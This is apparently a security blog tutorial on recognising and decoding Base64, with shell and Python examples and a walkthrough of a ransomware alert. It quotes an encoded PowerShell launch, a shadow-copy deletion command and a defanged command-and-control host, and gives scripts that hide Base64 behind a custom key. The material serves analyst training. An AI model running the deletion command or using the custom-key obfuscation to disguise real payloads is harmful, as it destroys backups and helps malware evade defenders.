Encoded strings are everywhere and have many legitimate uses across the technology sector. They are also widely used by malware authors to disguise their attacks and to implement anti-analysis techniques designed to frustrate malware hunters and reverse engineers. Understanding the encoding methods threat actors use helps in everyday operations and, more importantly, in cybersecurity and network security work. The most common methods are not terribly hard to learn and will help you make better decisions about the legitimacy of a command or call seen on your network. In this article, I will share both a simple and a slightly more advanced understanding of Base64 encoding. These are the methods that I use to both encode and decode in my daily work.
A Base64 string is pretty easy to identify:
VGhpcyBpcyB3aGF0IGJhc2U2NCBsb29rcyBsaWtlIGluIHRoZSB3aWxkLgo=
There are 64 characters in the Base64 “alphabet”, and an encoded string will contain a mixture of uppercase and lowercase letters, numbers, the symbols “+” and “/”, and sometimes an “=” or two (never more than two) at the end as padding. The length of a well-formed string must also be divisible by 4. The wiki article here goes into more detail about the background of the encoding’s implementation and history, but here we’ll focus on the practical aspects within a security context.
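The shape rules above can be turned into a quick check. The following is a minimal Python sketch, assuming the standard alphabet; the function name looks_like_base64 is made up for illustration. Passing the check only means a string has the right shape, since plenty of ordinary words (such as "test") also fit.

```python
import re

# Standard Base64 alphabet: A-Z, a-z, 0-9, "+" and "/",
# followed by at most two "=" padding characters.
BASE64_PATTERN = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def looks_like_base64(candidate: str) -> bool:
    """Return True if the string has the shape of well-formed Base64."""
    # The length of a well-formed string is a multiple of 4.
    if not candidate or len(candidate) % 4 != 0:
        return False
    return BASE64_PATTERN.fullmatch(candidate) is not None


print(looks_like_base64("VGhpcyBpcyB3aGF0IGJhc2U2NCBsb29rcyBsaWtlIGluIHRoZSB3aWxkLgo="))
print(looks_like_base64("not base64!"))
```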
There are a few things that I like to look for with Base64 strings:
A good rule of thumb for this is to decode the string on the command line, and if you cannot read the output then try writing it to a file and use something like Detect It Easy (D.I.E.) to determine how you can view the file contents.
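That rule of thumb could be scripted roughly as follows. This is a sketch only: the triage function, the output file name, and the short list of file signatures are illustrative assumptions, and a dedicated tool will recognize far more formats.

```python
import base64

# A few well-known leading byte signatures ("magic numbers").
MAGIC_NUMBERS = {
    b"MZ": "Windows PE executable",
    b"\x1f\x8b": "gzip-compressed data",
    b"PK\x03\x04": "ZIP archive",
}


def triage(encoded: str, out_path: str = "base64_out.bin") -> str:
    """Decode a Base64 string and describe what the bytes look like."""
    raw = base64.b64decode(encoded)
    try:
        text = raw.decode("utf-8")
        # Readable text: printable characters and whitespace only.
        if all(ch.isprintable() or ch.isspace() for ch in text):
            return "text: " + text.strip()
    except UnicodeDecodeError:
        pass
    # Not readable text: save the bytes for a file-identification tool.
    with open(out_path, "wb") as handle:
        handle.write(raw)
    for magic, description in MAGIC_NUMBERS.items():
        if raw.startswith(magic):
            return f"binary ({description}), written to {out_path}"
    return f"binary (unknown type), written to {out_path}"


print(triage("VGhpcyBpcyB3aGF0IGJhc2U2NCBsb29rcyBsaWtlIGluIHRoZSB3aWxkLgo="))
```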
Decoding is extremely easy and can be done on any OS. Let’s take a look at not only decoding but also encoding because, who knows? Maybe one day you will need or want to know both sides of the process.
On macOS/Linux with Bash (CLI) we can simply echo the target string and pipe it to the base64 utility:
$: echo "Hooked on phonics worked for me" | base64
On Windows, we can encode a string with PowerShell (CLI):
> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("Hooked on phonics worked for me"))
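The Bash command produces the output below. The PowerShell result is identical except that it ends in ZQ== instead of ZQo=, because echo appends a trailing newline to the input and PowerShell does not: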
SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo=
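When comparing encoders, the trailing newline that echo appends is worth checking, because it changes the last few characters of the result. A small Python sketch of the two cases:

```python
import base64

message = "Hooked on phonics worked for me"

# echo appends a newline, so the shell pipeline encodes 32 bytes.
with_newline = base64.b64encode((message + "\n").encode("utf-8")).decode("ascii")

# Encoding the bare string covers only the 31 message bytes.
without_newline = base64.b64encode(message.encode("utf-8")).decode("ascii")

print(with_newline)     # ends in "ZQo="
print(without_newline)  # ends in "ZQ=="
```

Both strings decode to the same sentence; the only difference is whether a newline follows it.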
To decode on macOS/Linux with Bash (CLI) it’s the same process, but this time we specify the --decode option:
$: echo "SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo=" | base64 --decode
We can achieve the same thing with a Python script like this:
#!/usr/bin/env python3
import base64

# Replace the quoted text with the string you wish to decode.
coded_string = 'SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo='

# Decode the string. b64decode returns bytes.
code_dump = base64.b64decode(coded_string)

# Print the decoded output to the screen.
print(code_dump.decode('utf-8', errors='replace'))

# Write the raw decoded bytes to a file.
with open('base64_out.txt', 'wb') as f:
    f.write(code_dump)
On Windows with PowerShell (CLI):
> [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo='))
We can swap out ASCII for UTF-8 if we prefer:
> [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo='))
As we did with Python above, we can replace the one-liner CLI with a PowerShell script if we wish:
# Replace the quoted text with the string you wish to decode.
$coded_string = "SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo="

# Print the decoded output to the screen.
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($coded_string))

# Write the decoded output to a file.
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($coded_string)) | Out-File -Encoding "ASCII" base64_out.txt
So let’s see how this could help us to understand an actual attack on the network. First, we take a look at an attack sequence; the first place I always look (if the process is there) will be PowerShell:
In this case, we have an alert regarding a PowerShell command. Given that this is a fileless attack, there is no hash reputation available via third-party validation tools. This means we need to review the threat details and attempt to figure out whether this alert is legitimate or not.
First we can review the Attack Story information in the Raw Data section of the SentinelOne console:
Instantly, we can see it begins with PowerShell executing a Base64-encoded string.
Note that this command is packed with some very common command line arguments that are very useful to know:
-noP (-NoProfile)
-sta
-w (-WindowStyle <Window style>)
-enc (-EncodedCommand <Base64EncodedCommand>)
Looking at the process information reveals another indicator:
Our first red alert is the vssadmin.exe delete shadows /all /quiet command. This is not an indicator of malicious intent per se, but it is extremely common with nearly all ransomware. This is confirmed by the file manipulation events:
Note the file behavior illustrates modification to the content of “Wildlife.wmv” and a change of the file extension from “wmv” to “tgrpkty”, a strong indicator of ransomware behavior.
Now let’s go ahead and review the data in Deep Visibility so that we can see other IOCs that can aid us in prevention:
Here we see the long, Base64-encoded string. It would be nice to know what it’s doing! Let’s extract the entire Base64 code block. Using the information we learned earlier we can now decode the attack and gain a better idea of what this command is trying to do.
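One way to script the extraction is sketched below in Python. PowerShell's -EncodedCommand parameter takes Base64 over UTF-16LE text, so the decoded bytes are read with that codec rather than ASCII. The command line shown is a harmless stand-in, not the one from this incident, and the pattern covers only a few common spellings of the parameter name.

```python
import base64
import re

# Matches -e, -ec, -enc or -EncodedCommand followed by a Base64 blob.
# Other abbreviations of the parameter name are not covered here.
ENCODED_ARG = re.compile(
    r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/]+={0,2})",
    re.IGNORECASE,
)


def extract_encoded_command(command_line: str):
    """Return the decoded PowerShell script, or None if no blob is found."""
    match = ENCODED_ARG.search(command_line)
    if match is None:
        return None
    # -EncodedCommand payloads are Base64 over UTF-16LE text.
    return base64.b64decode(match.group(1)).decode("utf-16-le")


# Hypothetical command line; the blob is the encoded form of "dir".
sample = "powershell.exe -noP -sta -w 1 -enc ZABpAHIA"
print(extract_encoded_command(sample))
```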
Here’s the encoded string:
Here’s what it looks like after being decoded with one of the methods we explained above:
We can now see the PowerShell in plain text, but let’s clean it up and “prettify” it. We can do that in Sublime Text with the help of a plugin. Here’s the decoded PowerShell now made much easier to read:
Now we can see that the command is reaching out to emp[.]fourhorsemen[.]tech over port 8080 for the /login/process.php file.
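Pulling the host, port, and path out of a decoded script can also be automated. The sketch below is only an illustration: the sample script text and the c2.example.test host are stand-ins (the port and path mirror the ones found here), and the function names are invented for this example.

```python
import re
from urllib.parse import urlsplit

# Loose pattern for http/https URLs embedded in script text.
URL_PATTERN = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def extract_indicators(script_text: str) -> list:
    """Collect host, port, and path for every URL found in the text."""
    indicators = []
    for url in URL_PATTERN.findall(script_text):
        parts = urlsplit(url)
        indicators.append(
            {"host": parts.hostname, "port": parts.port, "path": parts.path}
        )
    return indicators


def defang(host: str) -> str:
    """Make a hostname safe to paste into reports and tickets."""
    return host.replace(".", "[.]")


# Hypothetical decoded script line using a reserved test domain.
decoded = "(New-Object Net.WebClient).DownloadString('http://c2.example.test:8080/login/process.php')"
for item in extract_indicators(decoded):
    print(defang(item["host"]), item["port"], item["path"])
```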
While this is a very simple use case, it is a great example of the kind of counterintelligence that can be obtained with five minutes of extra work. Blocking the FQDN we extracted can not only increase infrastructure safety but also reduce the alerts that your IT or security team will need to address, saving you time for other tasks in the future.
So if this is so easy to decode then why use it to obfuscate malicious code? Great question!
The answer is that Base64 is not only OS-agnostic but, as it turns out, very robust and relatively easy to over-engineer. Sooner or later you will run into something that fails to decode:
This is where you start doing things like dumping the output to a file and checking to see if it’s Windows shellcode, but this can also happen when the author uses a custom encoding key. Conceptually, that’s not hard to do, but it requires the attacker to make the decoding key available to the system, and that means defenders always have the opportunity to reverse it if they can catch it in action.
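When a string refuses to decode, a few quick checks can narrow down why. The following Python sketch uses a hypothetical helper, diagnose_base64, and covers only a handful of common causes; the hints it returns are starting points, not conclusions.

```python
import base64
import binascii


def diagnose_base64(candidate: str) -> str:
    """Try a strict decode and give a hint when it fails."""
    try:
        base64.b64decode(candidate, validate=True)
        return "decodes cleanly with the standard alphabet"
    except binascii.Error:
        pass
    stripped = candidate.rstrip("=")
    if "-" in stripped or "_" in stripped:
        return "contains '-' or '_': try the URL-safe alphabet"
    if len(candidate) % 4 != 0:
        # Rebuild the padding and try once more.
        padded = stripped + "=" * (-len(stripped) % 4)
        try:
            base64.b64decode(padded, validate=True)
            return "padding was missing or wrong: decodes after re-padding"
        except binascii.Error:
            pass
    return "not standard Base64: possibly a custom alphabet or another encoding"


print(diagnose_base64("SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo"))
```

A clean decode does not prove the output is meaningful. A string built with a custom key that reuses the same 64 characters will decode without error and simply produce unreadable bytes.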
Let’s take a look. In Python, a simple way to create a Base64 string with a custom key is to use a character translation table:
import base64

default_key = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
custom_key = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/'

# Translation tables between the default and custom keys (Python 3).
encode_translation = str.maketrans(default_key, custom_key)
decode_translation = str.maketrans(custom_key, default_key)

def encode(text):
    # Standard Base64 first, then swap each character into the custom key.
    return base64.b64encode(text.encode()).decode().translate(encode_translation)

def decode(text):
    # Swap back to the default key, then decode as usual.
    return base64.b64decode(text.translate(decode_translation)).decode()

plain_string = 'malicious commands'
encoded_string = encode(plain_string)

print('Translation Key: ' + custom_key)
print('Plain Text String: ' + plain_string)
print('Base64 Encoded Plain Text String: ' + base64.b64encode(plain_string.encode()).decode())
print('Translated String: ' + plain_string.translate(encode_translation))
print('Base64 Encoded Translated String: ' + encoded_string)
print('-----------------------------------------------------------')
print('Default Key: ' + default_key)
print('Default Key Decoded Translated Base64 String: ' + encoded_string.translate(encode_translation))
print('Custom Key Decoded Translated Base64 String: ' + encoded_string.translate(decode_translation))
# Decoding with the default key yields unreadable bytes, so show their repr.
print('Default Key Decoded Translated String: ' + repr(base64.b64decode(encoded_string)))
print('Custom Key Decoded Translated String: ' + decode(encoded_string))
This script creates an output like so:
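Take note of the keys while we walk through this behavior:
Default key: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Custom key: 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/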
The translation is actually very simplistic:
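Using the above table you can see that when the script is translating strings, each character in the default key is replaced by the character at the same position in the custom key: A becomes 0, B becomes 1, a becomes q, and so on.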
Now apply that logic to the string we are encoding with the script:
Plain Text String: malicious
Translated String: CqBysyEKI
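The substitution can be reproduced in a few lines of Python. This sketch uses the same two keys as the script and str.maketrans from Python 3; the variable names are illustrative.

```python
default_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
custom_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/"

# Map each character of the default key to the character at the same
# position in the custom key.
encode_table = str.maketrans(default_key, custom_key)

# Show a few individual substitutions.
for ch in "ABab":
    print(ch, "->", ch.translate(encode_table))

# Characters outside the key, such as spaces, pass through unchanged.
print("malicious".translate(encode_table))  # CqBysyEKI
```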
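So this means that the plain text of:
malicious commands
would normally encode to the following Base64 string:
bWFsaWNpb3VzIGNvbW1hbmRz
Translating the plain text itself through the custom key gives:
CqBysyEKI sECCqDtI
The script’s encode function, however, applies the translation to the Base64 output rather than to the plain text, so the encoded string it produces is:
rm5IqmdFrTlP86dLrmRxrChP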
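It can help to check which order of operations produces which string. The Python sketch below, with illustrative variable names, compares encoding and then translating against translating and then encoding, and reverses the first. It suggests that rm5IqmdFrTlP86dLrmRxrChP comes from translating the Base64 output, not from encoding the translated plain text.

```python
import base64

default_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
custom_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/"
to_custom = str.maketrans(default_key, custom_key)
to_default = str.maketrans(custom_key, default_key)

plain = "malicious commands"

# Order 1: Base64-encode first, then translate the encoded text.
standard = base64.b64encode(plain.encode("ascii")).decode("ascii")
encode_then_translate = standard.translate(to_custom)

# Order 2: translate the plain text first, then Base64-encode it.
translated_plain = plain.translate(to_custom)
translate_then_encode = base64.b64encode(translated_plain.encode("ascii")).decode("ascii")

print(encode_then_translate)
print(translate_then_encode)

# Reversing order 1: translate back to the default key, then decode.
recovered = base64.b64decode(encode_then_translate.translate(to_default)).decode("ascii")
print(recovered)
```

A defender who recovers the custom key only needs to know which order was used to undo it.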
Obviously this process is very different in PowerShell but still achievable. Note that this version translates the plain text first and then Base64-encodes the result, and its keys omit the “+” and “/” characters:
Function encode_string {
    # Swap each character found in the default key for the character
    # at the same position in the custom key.
    foreach ($c in $args[0].ToCharArray()) {
        if ($default_key.Contains($c)) {
            $encode_string = $encode_string + $custom_key[$default_key.IndexOf($c)]
        } else {
            $encode_string = $encode_string + $c
        }
    }
    return $encode_string
}

Function decode_string {
    # Reverse the swap by looking each character up in the custom key.
    foreach ($c in $args[0].ToCharArray()) {
        if ($custom_key.Contains($c)) {
            $decode_string = $decode_string + $default_key[$custom_key.IndexOf($c)]
        } else {
            $decode_string = $decode_string + $c
        }
    }
    return $decode_string
}

$default_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
$custom_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

$string = "malicious commands"
$encoded_string = encode_string $string
$decoded_string = decode_string $encoded_string
$b64_default_encoded = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$string"))
$b64_custom_encoded = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$encoded_string"))

Write-Host "Translation Key:" $custom_key
Write-Host "Plain Text String:" $string
Write-Host "Base64 Encoded Plain Text String:" $b64_default_encoded
Write-Host "Translated String:" $encoded_string
Write-Host "Base64 Encoded Translated String:" $b64_custom_encoded
Write-Host "-----------------------------------------------------------"
Write-Host "Default Key:" $default_key
# Plain Base64 decoding alone only recovers the translated text.
# (The original line re-encoded the string here instead of decoding it.)
Write-Host "Default Key Decoded Translated String:" $([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b64_custom_encoded)))
Write-Host "Custom Key Decoded Translated String:" $decoded_string
This gives the following output:
Encoding, encrypting, and obfuscating are becoming more and more commonplace in our age of technology. Knowing the basics is key to understanding not just how to identify threat actors and malicious files but also how to keep our end-user data safe. It is important not only to understand how to read and reverse these strings but also to have security software on our network that provides the visibility we need to see these bits of code, so that we can attempt to identify new threats.